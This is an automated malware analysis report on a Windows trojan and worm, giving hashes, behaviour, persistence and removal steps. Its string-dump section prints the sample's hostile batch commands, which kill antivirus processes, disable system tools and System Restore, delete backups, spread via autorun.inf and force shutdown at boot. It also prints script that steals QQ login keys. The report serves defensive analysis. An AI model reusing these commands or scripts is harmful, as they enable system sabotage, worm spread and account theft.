Generic.Malware.SFMDYBVd.380DE3A6_a823d3943c

September 13, 2021 14:23

HEUR:Trojan.Win32.Generic (Kaspersky), Generic.Malware.SFMDYBVd.380DE3A6 (B) (Emsisoft), Generic.Malware.SFMDYBVd.380DE3A6 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, Worm, EmailWorm, WormAutorun, Malware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: a823d3943c7ecc605d5e5a2346eec144

SHA1: eb47cadac6c5d8d7e773bb41c91363c90bb181bf

SHA256: c46c81403bc2643dd9cbad88c3bf9bf1e0b82adc1fe6db44df2131cd0a03dc49

SSDeep: 6144:nq9Eypeh23JV66dr1p VOWliICbpJouNjbb1FSEBqVg8OM0bzp45fW:q9N3JV6kr1cVOWdCLFfXf8gnp41W

Size: 304640 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6

Company: no certificate found

Created at: 2013-08-20 20:07:35

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.
WormAutorun	A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer.

Process activity

The Generic creates the following process(es):

net.exe:1364
net.exe:1772
net1.exe:1316
net1.exe:644

The Generic injects its code into the following process(es):

%original file name%.exe:1756

Mutexes

The following mutexes were created/opened:

RasPbFileShimCacheMutex

File activity

The process %original file name%.exe:1756 makes changes in the file system.

The Generic creates and/or writes to the following file(s):

C:\slear.bat (50 bytes)
%System%\slear.exe (1425 bytes)

Registry activity

The process %original file name%.exe:1756 makes changes in the system registry.

The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 16 E1 49 03 B3 D8 72 E9 4D AF FC EE 14 31 D0"

To automatically run itself each time Windows is booted, the Generic adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"

The process net.exe:1364 makes changes in the system registry.

The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E F6 22 70 43 C0 C8 57 FE 6D 41 29 4E 51 1A F0"

The process net.exe:1772 makes changes in the system registry.

The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 69 8C 28 D6 E0 14 4D 51 9F 20 DE C2 2D 93 22"

The process net1.exe:1316 makes changes in the system registry.

The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 36 7D 30 6D 4A 0A 9E 92 98 50 4A EE 5B 12 7F"

The process net1.exe:644 makes changes in the system registry.

The Generic creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 78 7E 91 FB 80 78 06 E8 4F 84 B4 8E C5 03 C3"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer.

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
net.exe:1364
net.exe:1772
net1.exe:1316
net1.exe:644
Delete the original Generic file.
Delete or disinfect the following files created/modified by the Generic:
C:\slear.bat (50 bytes)
%System%\slear.exe (1425 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"
Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name: 2013????
Product Name: ??????
Product Version: 1.6.0.0
Legal Copyright: 2013???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.6.0.0
File Description: 2013
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral

Company Name: 2013????Product Name: ??????Product Version: 1.6.0.0Legal Copyright: 2013???? ????Legal Trademarks: Original Filename: Internal Name: File Version: 1.6.0.0File Description: 2013Comments: ??????????(http://www.eyuyan.com)Language: Language Neutral

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	651264	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	655360	290816	287232	5.49401	d3b9f527d2e9a1552783d2289ad5c0b8
.rsrc	946176	16384	16384	2.49987	e2784112b04c223b0d25494fb365f9a9

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
caf03e9cc3118627cd7c3d133a311224
0a9ae60a1507dc9b0141dcb01ee413f6

Network Activity

URLs

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Map

The Generic connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1756:

`.rsrc

`.rsrc

t$(SSh

t$(SSh

~%UVW

~%UVW

u$SShe

u$SShe

atl.dll

atl.dll

wininet.dll

wininet.dll

kernel32.dll

kernel32.dll

advapi32.dll

advapi32.dll

NTDLL.DLL

NTDLL.DLL

HttpOpenRequestA

HttpOpenRequestA

HttpSendRequestA

HttpSendRequestA

HttpQueryInfoA

HttpQueryInfoA

sleartest.exe

sleartest.exe

dll.bat

dll.bat

\*.dll

\*.dll

exe.bat

exe.bat

\*.exe

\*.exe

&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

&clientkey=

&clientkey=

hXXp://ptlogin2.qq.com/jump?clientuin=

hXXp://ptlogin2.qq.com/jump?clientuin=

hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone

skey=

skey=

#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm

#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm

qzreferrer=http://user.qzone.qq.com/

qzreferrer=http://user.qzone.qq.com/

hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=

hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=

qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=

qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=

hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=

hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=

qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=

qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=

hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=

hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=

SSOAxCtrlForPTLogin.SSOForPTLogin2

SSOAxCtrlForPTLogin.SSOForPTLogin2

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

document.body.innerHTML=GetuinKey();

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

http=

http=

https

https

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

HTTP/1.1

HTTP/1.1

hXXp://

hXXp://

len = str.length; i

len = str.length; i

var t = QZONE.FormSender;

var t = QZONE.FormSender;

if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {

if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {

var a = QZFL.string.trim(fm.action);

var a = QZFL.string.trim(fm.action);

a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();

a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();

fm.action = a

fm.action = a

slear && del / f / s / q c:\slear.bat

slear && del / f / s / q c:\slear.bat

c:\slear.bat

c:\slear.bat

cmd.exe

cmd.exe

c:\windows\system\shutdown.bat

c:\windows\system\shutdown.bat

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"

del :\forshotdown.cmd

del :\forshotdown.cmd

shutdown -s -t 0 && del / f / s / q c:\slear.bat

shutdown -s -t 0 && del / f / s / q c:\slear.bat

c:\windows\system32\slear.exe

c:\windows\system32\slear.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

hXXp://VVV.shafou.com

hXXp://VVV.shafou.com

copy %0 %windir%\system32\cmd.bat

copy %0 %windir%\system32\cmd.bat

attrib %windir%\system32\cmd.bat r s h

attrib %windir%\system32\cmd.bat r s h

%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul

%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul

%s% /im norton* /f >nul

%s% /im norton* /f >nul

%s% /im av* /f >nul

%s% /im av* /f >nul

%s% /im fire* /f >nul

%s% /im fire* /f >nul

%s% /im anti* /f >nul

%s% /im anti* /f >nul

%s% /im spy* /f >nul

%s% /im spy* /f >nul

%s% /im bullguard /f >nul

%s% /im bullguard /f >nul

%s% /im PersFw /f >nul

%s% /im PersFw /f >nul

%s% /im KAV* /f >nul

%s% /im KAV* /f >nul

%s% /im ZONEALARM /f >nul

%s% /im ZONEALARM /f >nul

%s% /im SAFEWEB /f >nul

%s% /im SAFEWEB /f >nul

%s% /im OUTPOST /f >nul

%s% /im OUTPOST /f >nul

%s% /im nv* /f >nul

%s% /im nv* /f >nul

%s% /im nav* /f >nul

%s% /im nav* /f >nul

%s% /im F-* /f >nul

%s% /im F-* /f >nul

%s% /im ESAFE /f >nul

%s% /im ESAFE /f >nul

%s% /im cle /f >nul

%s% /im cle /f >nul

%s% /im BLACKICE /f >nul

%s% /im BLACKICE /f >nul

%s% /im def* /f >nul

%s% /im def* /f >nul

%s% /im 360safe.exe /f >nul

%s% /im 360safe.exe /f >nul

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d

for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul

for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul

echo @echo off >d:\setup.bat

echo @echo off >d:\setup.bat

!^.^ >>d:\setup.bat

!^.^ >>d:\setup.bat

echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\

echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\

\a.bat >>d:\setup.bat

\a.bat >>d:\setup.bat

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat

/f >>d:\setup.bat

/f >>d:\setup.bat

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat

HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat

HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat

echo [windows] >> %windir%\win.ini

echo [windows] >> %windir%\win.ini

echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini

echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini

echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini

echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini

echo [boot] >> %windir%\system.ini

echo [boot] >> %windir%\system.ini

echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini

echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini

echo [AutoRun] >d:\autorun.inf

echo [AutoRun] >d:\autorun.inf

echo Open=setup.bat >>d:\autorun.inf

echo Open=setup.bat >>d:\autorun.inf

echo Open=system.bat >>d:\autorun.inf

echo Open=system.bat >>d:\autorun.inf

attrib d:\autorun.inf r s h >>d:\setup.bat

attrib d:\autorun.inf r s h >>d:\setup.bat

attrib d:\setup.bat r s h >>d:\setup.bat

attrib d:\setup.bat r s h >>d:\setup.bat

start d:\setup.bat /min >nul

start d:\setup.bat /min >nul

echo @echo off >>C:\AUTOEXEC.BAT

echo @echo off >>C:\AUTOEXEC.BAT

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d

C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT

C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d

/f >>C:\AUTOEXEC.BAT

/f >>C:\AUTOEXEC.BAT

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat

REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat

echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT

echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT

copy %0 %systemroot%\windows.bat >nul

copy %0 %systemroot%\windows.bat >nul

if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat

if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat

if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat

if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat

if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat

if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat

C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat

C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat

/f >>%windir%/system32/explorer.bat

/f >>%windir%/system32/explorer.bat

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %

echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %

windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat

windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %

echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %

windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat

windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat

echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat

echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat

attrib %windir%/system32/explorer.bat r s h%

attrib %windir%/system32/explorer.bat r s h%

attrib %systemroot%/windows.bat r s h

attrib %systemroot%/windows.bat r s h

for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat

for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat

for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat

for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat

for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat

for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat

for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf

for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf

for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf

for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf

copy %0 d:\Program" "Files\run.bat

copy %0 d:\Program" "Files\run.bat

for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min

for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min

>>%%c:\system.bat

>>%%c:\system.bat

for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat

for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat

for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul

for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul

for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul

for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul

if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat

if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat

attrib d:\Program" "Files\run.bat r s h >nul

attrib d:\Program" "Files\run.bat r s h >nul

hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat

hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun

SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled

SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind

SOFTWARE\360Safe\safemon\ExecAccess

SOFTWARE\360Safe\safemon\ExecAccess

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop

Software\Policies\Microsoft\Windows\System\DisableCMD

Software\Policies\Microsoft\Windows\System\DisableCMD

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu

Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803

Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\

SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\

